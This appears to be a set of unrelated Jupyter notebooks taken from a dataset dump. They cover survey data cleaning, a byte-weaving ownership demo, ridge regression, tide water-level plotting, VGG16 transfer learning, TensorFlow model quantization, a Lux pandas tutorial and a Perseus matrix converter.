text
stringlengths
2.5k
6.39M
kind
stringclasses
3 values
``` %matplotlib inline import pandas as pd # Import & combine the control & experimental groups! control = pd.read_csv("control.csv") control["group"] = 0 # control experimental = pd.read_csv("experimental.csv") experimental["group"] = 1 # experimental data = pd.concat([control,experimental], ignore_index=True) data.head(1) # It's cleaning time. # Rename the columns data.columns = [ 'timestamp', 'likeable', 'surprising', 'q1', 'q2', 'q3', 'q4', 'q5', 'q6', 'q7', 'q8', 'q9', 'q10', 'age', 'gender', 'edu', 'group' ] data.head() # Drop anyone who didn't respond to Likeable & Surprising data.dropna(subset=['likeable','surprising'], inplace=True) # And drop anyone who didn't answer at least ONE question in Q1-10 data.dropna(subset=['q1','q2','q3','q4','q5','q6','q7','q8','q9','q10'], how='all', inplace=True) # Any other blank Q's to 0 for i in range(10): col = "q" + str(i+1) data[col].fillna(0, inplace=True) # Convert edu to 'none', 'grade', 'high', '2yr', '4yr', 'masters', 'phd' pd.options.mode.chained_assignment = None # Shut up Pandas, I know what I'm doing (I think) print("Before:") print(data["edu"].value_counts(dropna=False)) data["edu"].fillna("none", inplace=True) # if didn't say, it's none rename_edu = { "Grade school/Primary school": "grade", "High school/Secondary school/GED": "high", "2-year college degree (Associate's)": "2yr", "4-year college degree (Bachelor's)": "4yr", "Master's degree": "masters", "PhD or other advanced professional degree": "phd", "None / Don't know / Rather not say": "none" } edu_col = data["edu"] for key, value in rename_edu.items(): edu_col[edu_col==key] = value print("\n\nAfter:") print(data["edu"].value_counts(dropna=False)) # Convert gender to 'm', 'f', 'nb', 'none' data["gender"] = data["gender"].str.lower().str.strip() # strip & lowercase it all print("Before:") print(data["gender"].value_counts(dropna=False)) data["gender"].fillna("none", inplace=True) # if didn't say, it's none # Rename to those 3 rename_gender = { "m": "m", "male": "m", "man": "m", "men": "m", "guy": "m", "f": "f", "female": "f", "woman": "f", "w": "f", "gal": "f", "nonbinary": "nb", "non-binary": "nb", "non binary": "nb", "agender": "nb", "questioning": "nb", "genderfluid": "nb", "other": "nb" } gender_col = data["gender"] for key, value in rename_gender.items(): gender_col[gender_col==key] = value # Everything else gets none # coz i hate cleaning data and y'all have a lot of typos gender_col[ ((gender_col!="m") & (gender_col!="f")) & (gender_col!="nb") ] = "none" print("\n\nAfter:") print(data["gender"].value_counts(dropna=False)) # Reset index, because we dropped some people earlier data.index = range(data.shape[0]) data.shape[0] data.to_csv("cleaned.csv") ```
github_jupyter
<h1>Table of Contents<span class="tocSkip"></span></h1> <div class="toc"><ul class="toc-item"><li><span><a href="#Essentially" data-toc-modified-id="Essentially-1"><span class="toc-item-num">1&nbsp;&nbsp;</span>Essentially</a></span><ul class="toc-item"><li><span><a href="#What's-happening?" data-toc-modified-id="What's-happening?-1.1"><span class="toc-item-num">1.1&nbsp;&nbsp;</span>What's happening?</a></span></li><li><span><a href="#weave" data-toc-modified-id="weave-1.2"><span class="toc-item-num">1.2&nbsp;&nbsp;</span>weave</a></span></li><li><span><a href="#unweave" data-toc-modified-id="unweave-1.3"><span class="toc-item-num">1.3&nbsp;&nbsp;</span>unweave</a></span></li><li><span><a href="#inspecting-the-parts-of-the-woven" data-toc-modified-id="inspecting-the-parts-of-the-woven-1.4"><span class="toc-item-num">1.4&nbsp;&nbsp;</span>inspecting the parts of the woven</a></span></li><li><span><a href="#a-bit-more-control-on-how-you-get-your-woven-parts" data-toc-modified-id="a-bit-more-control-on-how-you-get-your-woven-parts-1.5"><span class="toc-item-num">1.5&nbsp;&nbsp;</span>a bit more control on how you get your woven parts</a></span></li></ul></li></ul></div> ``` from owner import int_to_bytes, bytes_to_int # int_to_bytes(bytes_to_int()) bytes_to_int(int_to_bytes(123456)) == 123456 int_to_bytes(7, n_bytes=3) int_to_bytes(255, n_bytes=3) int_to_bytes(256, n_bytes=3) int_to_bytes(256 + 7, n_bytes=3) ``` # Essentially ``` from owner import weave, unweave assert unweave(weave(b'bob and alice')) == b'bob and alice' ``` ## What's happening? Well, here's what's happening by default. First, a weaver is made... ``` from owner import HeadWeaver weaver = HeadWeaver() ``` ## weave When we weave, we get the same original content, but with a bunch of "other junk"... ``` content = b'--this is where content goes--' extra_info = b'**optional free-from "extra info goes here: It is meant for ownership and dating info.**' w = weaver.weave(content, extra_info) w ``` ## unweave No fret though, we can unjunk the weave. ``` unwoven_content = weaver.unweave(w) assert unwoven_content == content # see that the unwoven content is the same as the original content unwoven_content ``` What does weaving and unweaving do for you? Well, that's up to you. It's just a means to add some information to some content, within the bytes of the content itself, and be able to still access the original content. What you put in the `extra_info` depends on you and your use case. The use case we have in mind here is: I want to prove that some content is mine by posting a hash of it on a block-chain. But if I just hash the content, only the content is represented, not any other information (such as my name etc.). Simple solution to that: Just prepend my name (or any other information) to the raw content. That's what `extra_info` is. Ah... but then I need to know where the original content starts. That's what `offset` is. And then we added a `content_hash` to add extra error-correcting abilities. Let's now have a look at how the woven bytes are parsed. ## inspecting the parts of the woven ``` parts = weaver.unweave_parts(w) parts parts._fields ``` As you see in the print out above, the parts are all given in raw bytes format. If you need them to be interpreted you can do so like this: ``` parts = weaver.unweave_parts(w, interpret_bytes=True) parts ``` The offset tells us where the content actually starts. Here, we know it starts at the 184th byte. ``` parts.offset ``` The ``content_hash`` is the sha256 of the original contents, here presented in hex form. ``` parts.content_hash parts.extra_info parts.content ``` ## a bit more control on how you get your woven parts ``` import json weaver = HeadWeaver() content = 'This is some text' extra_info = {"name": "Thor Whalen", "date": "2013-12-11"} w = weaver.weave(content.encode(), json.dumps(extra_info).encode()) parts = weaver.unweave_parts(w, interpret_bytes=True, decode_content=True, decode_extra_info=json.loads) parts assert isinstance(parts.extra_info, dict) # I'm now getting extra_info in the form of a dict parts.extra_info assert isinstance(parts.content, str) # content is as a str parts.content ```
github_jupyter
# Ridge regression and model selection Modified from the github repo: https://github.com/JWarmenhoven/ISLR-python which is based on the book by James et al. Intro to Statistical Learning. ## Loading data ``` # %load ../standard_import.txt import pandas as pd import numpy as np import matplotlib.pyplot as plt from sklearn.preprocessing import scale from sklearn.linear_model import LinearRegression, Ridge, RidgeCV, Lasso, LassoCV from sklearn.decomposition import PCA from sklearn.metrics import mean_squared_error %matplotlib inline plt.style.use('ggplot') datafolder = "../data/" def loo_risk(X,y,regmod): """ Construct the leave-one-out square error risk for a regression model Input: design matrix, X, response vector, y, a regression model, regmod Output: scalar LOO risk """ loo = LeaveOneOut() loo_losses = [] for train_index, test_index in loo.split(X): X_train, X_test = X[train_index], X[test_index] y_train, y_test = y[train_index], y[test_index] regmod.fit(X_train,y_train) y_hat = regmod.predict(X_test) loss = np.sum((y_hat - y_test)**2) loo_losses.append(loss) return np.mean(loo_losses) def emp_risk(X,y,regmod): """ Return the empirical risk for square error loss Input: design matrix, X, response vector, y, a regression model, regmod Output: scalar empirical risk """ regmod.fit(X,y) y_hat = regmod.predict(X) return np.mean((y_hat - y)**2) # In R, I exported the dataset from package 'ISLR' to a csv file. df = pd.read_csv(datafolder+'Hitters.csv', index_col=0).dropna() df.index.name = 'Player' df.info() df.head() dummies = pd.get_dummies(df[['League', 'Division', 'NewLeague']]) dummies.info() print(dummies.head()) y = df.Salary # Drop the column with the independent variable (Salary), and columns for which we created dummy variables X_ = df.drop(['Salary', 'League', 'Division', 'NewLeague'], axis=1).astype('float64') # Define the feature set X. X = pd.concat([X_, dummies[['League_N', 'Division_W', 'NewLeague_N']]], axis=1) X.info() X.head(5) ``` ## Ridge Regression ``` alphas = 10**np.linspace(10,-2,100)*0.5 ridge = Ridge() coefs = [] for a in alphas: ridge.set_params(alpha=a) ridge.fit(scale(X), y) coefs.append(ridge.coef_) ax = plt.gca() ax.plot(alphas, coefs) ax.set_xscale('log') ax.set_xlim(ax.get_xlim()[::-1]) # reverse axis plt.axis('tight') plt.xlabel('lambda') plt.ylabel('weights') plt.title('Ridge coefficients as a function of the regularization'); ``` The above plot shows that the Ridge coefficients get larger when we decrease lambda. ## Exercises __Exercise 1__ Plot the LOO risk and the empirical risk as a function of lambda. ``` alphas = np.linspace(30,1,100) rcv = RidgeCV(alphas = alphas, store_cv_values=True,normalize=True) rcv.fit(X,y) cv_vals = rcv.cv_values_ LOOr = cv_vals.mean(axis=0) EMPr = [] for a in alphas: ridge.set_params(alpha=a) ridge.fit(scale(X), y) EMPr.append(emp_risk(X,y,ridge)) plt.plot(alphas,LOOr) plt.xlabel('lambda') plt.ylabel('Risk') plt.title('LOO Risk for Ridge'); plt.show() plt.plot(alphas,EMPr) plt.xlabel('lambda') plt.ylabel('Risk') plt.title('Emp Risk for Ridge'); plt.show() ``` __Exercise 2__ Implement and test forward stagewise regression (recall that stagewise and stepwise are different). ``` n,p = X.shape Xsc = scale(X) ysc = scale(y) ``` I'll implement a different variant of forward stagewise, where the correlation updates the current beta vector by adding them. ``` MSEiter = [] res = ysc beta = np.zeros(p) tol = 1e-2 corrmax = 1. while corrmax > tol: res_corr = Xsc.T.dot(scale(res)) / n jmax, corrmax = max(enumerate(np.abs(res_corr)), key=lambda x: x[1]) beta[jmax] = beta[jmax] + res_corr[jmax] res = ysc - Xsc.dot(beta) MSE = np.sum(res**2.) MSEiter.append(MSE) beta lm = LinearRegression() lm.fit(Xsc,ysc) lm.coef_ ```
github_jupyter
# Develop `tide_stn_water_level` Figure Module Development of functions for `nowcast.figures.fvcom.tide_stn_water_level` web site figure module. ``` from contextlib import suppress from datetime import timedelta from pathlib import Path import shlex import subprocess from types import SimpleNamespace import arrow import matplotlib.dates import matplotlib.pyplot as plt import requests import xarray from salishsea_tools import data_tools from salishsea_tools.places import PLACES from nowcast.figures import shared import nowcast.figures.website_theme %matplotlib inline ``` ## `_get_ssh_forecast()` Function ``` def _get_nemo_ssh(place, dataset_url_tmpl): ## TODO: This is a work-around because neither netCDF4 nor xarray are able ## to load the dataset directly from the URL due to an OpenDAP issue dataset_url = dataset_url_tmpl.format(place=place.replace(" ", "")) dataset_id = dataset_url.rsplit('/', 1)[1] ssh_file = Path('/tmp').joinpath(dataset_id).with_suffix('.nc') with ssh_file.open('wb') as f: resp = requests.get(f'{dataset_url}.nc') f.write(resp.content) try: nemo_ssh = xarray.open_dataset(ssh_file) except OSError: raise ValueError(f'NEMO ssh dataset not found for {place}') return nemo_ssh ``` ## `_prep_plot_data()` Function ``` def _prep_plot_data(place, fvcom_ssh_dataset, nemo_ssh_dataset_url_tmpl): # FVCOM sea surface height dataset fvcom_ssh = fvcom_ssh_dataset.zeta.isel( station=[ name.decode().strip().split(maxsplit=1)[1] for name in fvcom_ssh_dataset.name_station.values ].index(place)) fvcom_period = slice( str(fvcom_ssh.time.values[0]), str(fvcom_ssh.time.values[-1]) ) # NEMO sea surface height dataset try: nemo_ssh = _get_nemo_ssh(place, nemo_ssh_dataset_url_tmpl).sel(time=fvcom_period) except ValueError: # No NEMO sea surface height dataset for place nemo_ssh = None # CHS water level observations dataset try: obs_1min = data_tools.get_chs_tides( 'obs', place, arrow.get(fvcom_period.start) - timedelta(seconds=5 * 60), arrow.get(fvcom_period.stop) ) obs = xarray.Dataset({ 'water_level': xarray.DataArray(obs_1min).rename({ 'dim_0': 'time' }) }) except TypeError: # Invalid tide gauge station number, probably None obs = None # CHS water level predictions dataset try: pred_place = 'Point Atkinson' if place == 'Sandy Cove' else place pred = data_tools.get_chs_tides( 'pred', pred_place, arrow.get(fvcom_period.start), arrow.get(fvcom_period.stop) ) pred = xarray.Dataset({ 'water_level': xarray.DataArray.from_series(pred).rename({ 'index': 'time' }) }) except TypeError: # Invalid tide gauge station number, probably None pred = None # Change dataset times to Pacific time zone shared.localize_time(fvcom_ssh) with suppress(AttributeError): shared.localize_time(nemo_ssh) with suppress(IndexError, AttributeError): shared.localize_time(obs) with suppress(IndexError, AttributeError): shared.localize_time(pred) # Mean sea level msl = PLACES[place]['mean sea lvl'] return SimpleNamespace( fvcom_ssh=fvcom_ssh, nemo_ssh=nemo_ssh, obs=obs, pred=pred, msl=msl, ) ``` ## `_prep_fig_axes()` Function ``` def _prep_fig_axes(figsize, theme): fig, ax = plt.subplots( 1, 1, figsize=figsize, facecolor=theme.COLOURS['figure']['facecolor'] ) fig.autofmt_xdate() return fig, ax ``` ## `_plot_water_level_time_series()` Function ``` def _plot_water_level_time_series(ax, place, plot_data, theme): with suppress(AttributeError): # CHS sometimes returns an empty prediction dataset if plot_data.pred.water_level.size: plot_data.pred.water_level.plot( ax=ax, linewidth=2, label='CHS Predicted', color=theme.COLOURS['time series']['tidal prediction'] ) with suppress(AttributeError): # CHS sometimes returns an empty observations dataset if plot_data.obs.water_level.size: plot_data.obs.water_level.plot( ax=ax, linewidth=2, label='CHS Observed', color=theme.COLOURS['time series']['tide gauge obs'] ) with suppress(AttributeError): (plot_data.nemo_ssh.ssh + plot_data.msl).plot( ax=ax, linewidth=2, label='NEMO', color=theme.COLOURS['time series']['tide gauge ssh'] ) (plot_data.fvcom_ssh + plot_data.msl).plot( ax=ax, linewidth=2, label='FVCOM', color=theme.COLOURS['time series']['vhfr fvcom ssh'] ) legend = ax.legend(prop=theme.FONTS['legend label small']) legend.set_title('Legend', prop=theme.FONTS['legend title small']) _water_level_time_series_labels(ax, place, plot_data, theme) ``` ## `_water_level_time_series_labels()` Function ``` def _water_level_time_series_labels(ax, place, plot_data, theme): ax.set_title( f'Water Level at {place}', fontproperties=theme.FONTS['axes title'], color=theme.COLOURS['text']['axes title'] ) ax.set_xlabel( f'Time [{plot_data.fvcom_ssh.attrs["tz_name"]}]', fontproperties=theme.FONTS['axis'], color=theme.COLOURS['text']['axis'] ) ax.xaxis.set_major_formatter(matplotlib.dates.DateFormatter('%d%b %H:%M')) ax.set_ylabel( 'Water Level above Chart Datum [m]', fontproperties=theme.FONTS['axis'], color=theme.COLOURS['text']['axis'] ) ax.grid(axis='both') theme.set_axis_colors(ax) ``` ## `make_figure()` Function This is is the function that will be called by the `nowcast.workers.make_plots` worker to return a `matplotlib.figure.Figure` object. ``` def make_figure(place, fvcom_ssh_dataset_path, nemo_ssh_dataset_url_tmpl, figsize=(16, 9), theme=nowcast.figures.website_theme): plot_data = _prep_plot_data(place, fvcom_ssh_dataset_path, nemo_ssh_dataset_url_tmpl) fig, ax = _prep_fig_axes(figsize, theme) _plot_water_level_time_series(ax, place, plot_data, theme) return fig ``` ## Render the Figure The `%%timeit` cell magic lets us keep an eye on how log the figure takes to process. Setting `-n1 -r1` prevents it from processing the figure more than once as it might try to do to generate better statistics. ### Nowcast Figure ``` %%timeit -n1 -r1 from importlib import reload from nowcast.figures import website_theme from salishsea_tools import places reload(website_theme) reload(places) run_type = 'nowcast' run_date = arrow.get('2018-05-09') fvcom_ssh_dataset_path_tmpl = '/opp/fvcom/{run_type}/{ddmmmyy}/vhfr_low_v2_station_timeseries.nc' if run_type == 'nowcast': fvcom_ssh_dataset_path = Path( fvcom_ssh_dataset_path_tmpl.format(run_type=run_type, ddmmmyy=run_date.format("DDMMMYY").lower()) ) else: nowcast_dataset_path = Path( fvcom_ssh_dataset_path_tmpl.format(run_type=run_type, ddmmmyy=run_date.format("DDMMMYY").lower()) ) forecast_dataset_path = Path( fvcom_ssh_dataset_path_tmpl.format(run_type=run_type, ddmmmyy=run_date.replace(days=+1).format("DDMMMYY").lower()) ) fvcom_ssh_dataset_path = '/tmp/vhfr_low_v2_station_timeseries_forecast.nc' cmd = f'ncrcat {nowcast_dataset_path} {forecast_dataset_path} -o {fvcom_ssh_dataset_path}' subprocess.check_output(shlex.split(cmd)) cmd = ( f'ncrename -O -v siglay,sigma_layer -v siglev,sigma_level ' f'{fvcom_ssh_dataset_path} /tmp/{fvcom_ssh_dataset_path.name}') subprocess.check_output(shlex.split(cmd)) fvcom_ssh_dataset = xarray.open_dataset(f'/tmp/{fvcom_ssh_dataset_path.name}') nemo_ssh_dataset_url_tmpl = 'https://salishsea.eos.ubc.ca/erddap/griddap/ubcSSf{place}SSH10mV17-02' fig = make_figure('Sandy Cove', fvcom_ssh_dataset, nemo_ssh_dataset_url_tmpl) ``` ### Forecast Figure ``` %%timeit -n1 -r1 from importlib import reload from nowcast.figures import website_theme from salishsea_tools import places reload(website_theme) reload(places) run_type = 'forecast' run_date = arrow.get('2018-05-09') fvcom_ssh_dataset_path_tmpl = '/opp/fvcom/{run_type}/{ddmmmyy}/vhfr_low_v2_station_timeseries.nc' if run_type == 'nowcast': fvcom_ssh_dataset_path = Path( fvcom_ssh_dataset_path_tmpl.format(run_type=run_type, ddmmmyy=run_date.format("DDMMMYY").lower()) ) else: nowcast_dataset_path = Path( fvcom_ssh_dataset_path_tmpl.format(run_type='nowcast', ddmmmyy=run_date.format("DDMMMYY").lower()) ) forecast_dataset_path = Path( fvcom_ssh_dataset_path_tmpl.format(run_type='forecast', ddmmmyy=run_date.format("DDMMMYY").lower()) ) fvcom_ssh_dataset_path = Path('/tmp/vhfr_low_v2_station_timeseries_forecast.nc') cmd = f'ncrcat -O {nowcast_dataset_path} {forecast_dataset_path} -o {fvcom_ssh_dataset_path}' subprocess.check_output(shlex.split(cmd)) cmd = ( f'ncrename -O -v siglay,sigma_layer -v siglev,sigma_level ' f'{fvcom_ssh_dataset_path} /tmp/{fvcom_ssh_dataset_path.name}') subprocess.check_output(shlex.split(cmd)) fvcom_ssh_dataset = xarray.open_dataset(f'/tmp/{fvcom_ssh_dataset_path.name}') nemo_ssh_dataset_url_tmpl = 'https://salishsea.eos.ubc.ca/erddap/griddap/ubcSSf{place}SSH10mV17-02' fig = make_figure('Sandy Cove', fvcom_ssh_dataset, nemo_ssh_dataset_url_tmpl) ```
github_jupyter
<a href="https://colab.research.google.com/github/0201shj/CNN-Cats-Dogs/blob/main/4_2_aug_pretrained_ipynb.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a> ``` from google.colab import drive drive.mount('/content/drive') %matplotlib inline !ls -l !unzip training_data.zip !unzip validation_data.zip import glob import numpy as np import matplotlib.pyplot as plt from tensorflow.keras.preprocessing.image import ImageDataGenerator, load_img, img_to_array, array_to_img IMG_DIM = (150, 150) train_files = glob.glob('training_data/*') train_imgs = [img_to_array(load_img(img, target_size=IMG_DIM)) for img in train_files] train_imgs = np.array(train_imgs) train_labels = [fn.split('/')[1].split('.')[0].strip() for fn in train_files] validation_files = glob.glob('validation_data/*') validation_imgs = [img_to_array(load_img(img, target_size=IMG_DIM)) for img in validation_files] validation_imgs = np.array(validation_imgs) validation_labels = [fn.split('/')[1].split('.')[0].strip() for fn in validation_files] print('Train dataset shape:', train_imgs.shape, '\tValidation dataset shape:', validation_imgs.shape) train_imgs_scaled = train_imgs.astype('float32') validation_imgs_scaled = validation_imgs.astype('float32') train_imgs_scaled /= 255 validation_imgs_scaled /= 255 batch_size = 50 num_classes = 2 epochs = 50 input_shape = (150, 150, 3) from sklearn.preprocessing import LabelEncoder le = LabelEncoder() le.fit(train_labels) # encode wine type labels train_labels_enc = le.transform(train_labels) validation_labels_enc = le.transform(validation_labels) print(train_labels[0:5], train_labels_enc[0:5]) train_datagen = ImageDataGenerator( zoom_range=0.3, rotation_range=50, # rescale=1./255, width_shift_range=0.2, height_shift_range=0.2, shear_range=0.2, horizontal_flip=True, fill_mode='nearest') val_datagen = ImageDataGenerator() # rescale=1./255 train_generator = train_datagen.flow(train_imgs, train_labels_enc, batch_size=30) val_generator = val_datagen.flow(validation_imgs, validation_labels_enc, batch_size=20) from tensorflow.keras.applications import vgg16 from tensorflow.keras.models import Model import tensorflow.keras vgg = vgg16.VGG16(include_top=False, weights='imagenet', input_shape=input_shape) output = vgg.layers[-1].output output = tensorflow.keras.layers.Flatten()(output) vgg_model = Model(vgg.input, output) vgg_model.trainable = False for layer in vgg_model.layers: layer.trainable = False vgg_model.summary() import pandas as pd pd.set_option('max_colwidth', -1) layers = [(layer, layer.name, layer.trainable) for layer in vgg_model.layers] pd.DataFrame(layers, columns=['Layer Type', 'Layer Name', 'Layer Trainable']) print("Trainable layers:", vgg_model.trainable_weights) bottleneck_feature_example = vgg.predict(train_imgs_scaled[0:1]) print(bottleneck_feature_example.shape) plt.imshow(bottleneck_feature_example[0][:,:,0]) def get_bottleneck_features(model, input_imgs): features = model.predict(input_imgs, verbose=0) return features train_features_vgg = get_bottleneck_features(vgg_model, train_imgs_scaled) validation_features_vgg = get_bottleneck_features(vgg_model, validation_imgs_scaled) print('Train Bottleneck Features:', train_features_vgg.shape, '\tValidation Bottleneck Features:', validation_features_vgg.shape) from tensorflow.keras.layers import Conv2D, MaxPooling2D, Flatten, Dense, Dropout, InputLayer from tensorflow.keras.models import Sequential from tensorflow.keras import optimizers model = Sequential() model.add(vgg_model) model.add(Dense(512, activation='relu', input_dim=input_shape)) model.add(Dropout(0.3)) model.add(Dense(64, activation='relu')) model.add(Dropout(0.3)) model.add(Dense(1, activation='sigmoid')) model.compile(loss='binary_crossentropy', optimizer=optimizers.RMSprop(lr=2e-5), metrics=['accuracy']) model.summary() history = model.fit_generator(train_generator, epochs=50, validation_data=val_generator, verbose=1) f, (ax1, ax2) = plt.subplots(1, 2, figsize=(12, 4)) t = f.suptitle('Pre-trained CNN (Transfer Learning) Performance', fontsize=12) f.subplots_adjust(top=0.85, wspace=0.3) epoch_list = list(range(1,51)) ax1.plot(epoch_list, history.history['accuracy'], label='Train Accuracy') ax1.plot(epoch_list, history.history['val_accuracy'], label='Validation Accuracy') ax1.set_xticks(np.arange(0, 51, 5)) ax1.set_ylabel('Accuracy Value') ax1.set_xlabel('Epoch') ax1.set_title('Accuracy') l1 = ax1.legend(loc="best") ax2.plot(epoch_list, history.history['loss'], label='Train Loss') ax2.plot(epoch_list, history.history['val_loss'], label='Validation Loss') ax2.set_xticks(np.arange(0, 51, 5)) ax2.set_ylabel('Loss Value') ax2.set_xlabel('Epoch') ax2.set_title('Loss') l2 = ax2.legend(loc="best") model.save('4_2-pretrained Aug_cnn.h5') ```
github_jupyter
``` import os os.environ['CUDA_VISIBLE_DEVICES'] = '' # !wget https://f000.backblazeb2.com/file/malaya-model/v38/translation/en-ms/base-translation.pb # !wget https://f000.backblazeb2.com/file/malaya-model/v38/translation/en-ms/small-translation.pb # !wget https://f000.backblazeb2.com/file/malaya-model/v38/translation/en-ms/large-translation.pb import tensorflow as tf from tensorflow.tools.graph_transforms import TransformGraph from glob import glob tf.set_random_seed(0) pbs = glob('*.pb') pbs import tensorflow_text import tf_sentencepiece transforms = ['add_default_attributes', 'remove_nodes(op=Identity, op=CheckNumerics, op=Dropout)', 'fold_constants(ignore_errors=true)', 'fold_batch_norms', 'fold_old_batch_norms', 'quantize_weights(fallback_min=-10, fallback_max=10)', 'strip_unused_nodes', 'sort_by_execution_order'] for pb in pbs: input_graph_def = tf.GraphDef() with tf.gfile.FastGFile(pb, 'rb') as f: input_graph_def.ParseFromString(f.read()) print(pb) transformed_graph_def = TransformGraph(input_graph_def, ['Placeholder'], ['greedy', 'beam'], transforms) with tf.gfile.GFile(f'{pb}.quantized', 'wb') as f: f.write(transformed_graph_def.SerializeToString()) quantized = glob('*.pb.quantized') quantized !rm *.pb* # converter = tf.compat.v1.lite.TFLiteConverter.from_frozen_graph( # graph_def_file='test.pb', # input_arrays=['Placeholder', 'Placeholder_1'], # input_shapes={'Placeholder' : [None, 512], 'Placeholder_1': [None, 512]}, # output_arrays=['logits'], # ) # # converter.allow_custom_ops=True # converter.target_spec.supported_ops = [tf.lite.OpsSet.TFLITE_BUILTINS, tf.lite.OpsSet.SELECT_TF_OPS] # converter.target_spec.supported_types = [tf.float16] # converter.optimizations = [tf.lite.Optimize.DEFAULT] # converter.experimental_new_converter = True # tflite_model = converter.convert() # converter.target_spec.supported_ops = [tf.lite.OpsSet.TFLITE_BUILTINS, # tf.lite.OpsSet.SELECT_TF_OPS] # converter.target_spec.supported_types = [tf.float16] # converter.optimizations = [tf.lite.Optimize.DEFAULT] # tflite_model = converter.convert() # with open('tiny-bert-sentiment-float16.tflite', 'wb') as f: # f.write(tflite_model) # converter.target_spec.supported_ops = [tf.lite.OpsSet.TFLITE_BUILTINS, # tf.lite.OpsSet.SELECT_TF_OPS] # converter.optimizations = [tf.lite.Optimize.OPTIMIZE_FOR_SIZE] # tflite_model = converter.convert() # with open('tiny-bert-sentiment-hybrid.tflite', 'wb') as f: # f.write(tflite_model) # interpreter = tf.lite.Interpreter(model_path='tiny-bert-sentiment-hybrid.tflite') # interpreter.allocate_tensors() ```
github_jupyter
# Overview of Lux Lux is designed to be tightly integrated with Pandas and can be used as-is, without modifying your existing Pandas code. To enable Lux, simply add `import lux` along with your Pandas import statement. ``` import pandas as pd import lux ``` Lux preserves the Pandas dataframe semantics -- which means that you can apply any command from Pandas's API to the dataframes in Lux and expect the same behavior. For example, we can load the dataset via standard Pandas `read_*` commands. ``` df = pd.read_csv("../data/college.csv") ``` Lux is built on the philosophy that generating useful visualizations should be as simple as printing out a dataframe. When you print out the dataframe in the notebook, you should see the default Pandas table display with an additional Toggle button. ``` df ``` By clicking on the Toggle button, you can now explore the data visually through Lux. You should see three tabs of visualizations recommended to you. Voila! You have generated your first set of recommendations through Lux! Next, we will describe the details of how these recommendations are generated. ## Visualizing Dataframes with _Recommendations_ Recommendations highlight interesting patterns and trends in your dataframe. Lux offers different types of recommendations, known as _analytical actions_. These analytical actions represent different analysis that can be performed on the data. Lux recommends a set of actions depending on the content of your dataframe and your analysis goals and interests (described later). As shown in the example above, by default, we display three types of actions shown as different tabs: - **Correlation** displays relationships between two quantitative variables, ranked by the most to least correlated scatterplots. <img src="https://github.com/lux-org/lux-resources/blob/master/doc_img/correlation.png?raw=true" width=400 alt="Example of high/low correlation visualizations"> - **Distribution** displays histogram distributions of different quantitative attributes in the dataframe, ranked by the most to least skewed distributions. <img src="https://github.com/lux-org/lux-resources/blob/master/doc_img/distribution.png?raw=true" width=400 alt="Example of high/low skew distributions"> - **Occurrence** displays bar chart distributions of different categorical attributes in the dataframe, ranked by the most to least uneven bar charts. <img src="https://github.com/lux-org/lux-resources/blob/master/doc_img/category.png?raw=true" width=400 alt="Example of even and uneven category distributions"> ## Seamless Integration with Pandas We see that the information about ACTMedian and SATAverage has a very strong correlation. This means that we could probably just keep one of the columns and still get about the same information. So let's drop the ACTMedian column. ``` df = df.drop(columns=["ACTMedian"]) df ``` Notice how the recommendations are regenerated based on the updated dataframe. This means that we can seamlessly go from doing data transformations to visualizing our dataframes without having to import or export out of any visualization tool. ## Steering Recommendations via User Intent We saw an example of how recommendations can be generated for the dataframe without providing additional information. Beyond these basic recommendations, you can further specify your analysis *intent*, i.e., the data attributes and values that you are interested in visualizing. For example, let's say that you are interested in learning more about the median earning of students after they attend the college. You can set your intent in Lux to indicate that you are interested the attribute `MedianEarning`. ``` df.intent = ["MedianEarnings"] ``` When you print out the dataframe again, you should see three different tabs of visualizations recommended to you. ``` df ``` In the displayed widget, the visualization on the left represent the visualization that you have specified as the intent. On the right, you see the gallery of visualizations recommended based on the specified intent. Given the current intent represented as C = {<code>MedianEarnings</code>}, additional actions (**Enhance** and **Filter**) are generated. - **Enhance** adds an attribute to intended visualization. Enhance lets users compare the effect the added variable on the intended visualization. For example, enhance displays visualizations involving C' = {<code>MedianEarnings</code>, **added attribute**}, including: - {<code>MedianEarnings</code>, **<code>Expenditure</code>**} - {<code>MedianEarnings</code>, **<code>AverageCost</code>**} - {<code>MedianEarnings</code>, **<code>AverageFacultySalary</code>**}. <img src="https://github.com/lux-org/lux-resources/blob/master/doc_img/overview-4.png?raw=true" width=800 alt="Screenshot of Enhance"> - **Filter** adds an additional filter to the intended visualization. Filter lets users browse through what the intended visualization looks like for different subsets of data. For example, Filter displays visualizations involving C' = {<code>MedianEarnings</code>, **added filter**}, including: - {<code>MedianEarnings</code>, **<code>FundingModel=Public</code>**} - {<code>MedianEarnings</code>, **<code>Region=Southeast</code>**} - {<code>MedianEarnings</code>, **<code>Region=Great Lakes</code>**}. <img src="https://github.com/lux-org/lux-resources/blob/master/doc_img/overview-5.png?raw=true" width=800 alt="Screenshot of Filter"> Lux supports a variety of analysis intent, such as specifying values of interest or encoding preferences, refer to [this page](https://lux-api.readthedocs.io/en/latest/source/guide/intent.html) to learn more about it.
github_jupyter
``` ''' For generate Betti_0 and betti_1 of 2017 dailyAmountMatrices, change the format of all matrices according the format of the http://people.maths.ox.ac.uk/nanda/perseus/ format example: 3: the ambient dimension, i.e., the number of coordinates per vertex. 1 0.01 100: the radius scaling factor k=1, the step size s=0.01, the number of steps N=100 1.2 3.4 -0.9 0.5: the vertex (1.2, 3.4, -0.9) with associated radius r = 0.5 2.0 -6.6 4.1 0.3: the vertex (2.0, -6.6, 4.1) with associated radius r = 0.3 and so on! (http://people.maths.ox.ac.uk/nanda/source/distmat.txt) then use the following command to convert matrix: (path to perseus executable) (complex type) (input filename) (output file string) command example: ./perseus distmat ../data/dailyAmoMatrices/amo2017001.csv ../data/random_regression ''' import pandas as pd import math import numpy as np YEAR = 2017 data_path = "C:/Users/wang.yuhao/Documents/CoinWorks-master/data/dailyAmoMatrices/" def read_csv(file_name, day): names=[] for i in range(20): names.append(str(i)) data = pd.read_csv(file_name, header=None, names=names) data = data/(10^8) + 1 data = data.apply(np.log) row_count = pd.DataFrame({"0": [data.shape[0]]}) print(row_count) param = pd.DataFrame({"0": [0], "1": [1], "2": [101], "3": [2]}) print(param) header = row_count.append(param, ignore_index=True) print(header) data = header.append(data, ignore_index=True) print(data) data.to_csv("C:/Users/wang.yuhao/Documents/CoinWorks-master/data/dailyVrAmoMatrices/" + "vrAmo" + str(YEAR) + '{:03}'.format(day) + ".csv", sep=" ", index=False, header=False) for day in range(1, 2): file_name = data_path + "amo" + str(YEAR) + '{:03}'.format(day) + ".csv" read_csv(file_name,day) from subprocess import check_output 